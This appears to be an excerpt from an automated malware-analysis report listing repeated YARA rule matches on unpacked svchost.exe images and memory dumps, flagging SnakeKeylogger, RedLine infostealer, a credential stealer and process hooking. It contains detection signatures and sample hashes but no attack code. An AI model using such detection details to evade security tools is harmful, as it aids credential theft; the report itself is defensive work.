Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7730000.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b40000.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7f00000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b40f20.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.svchost.exe.346f000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.3174f2e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 5.2.chordates.exe.13e0000.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.3574f2e.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7730f20.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7b00000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.svchost.exe.346ff20.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 3.3.svchost.exe.305a000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.4470352706.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000002.00000002.2040744990.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
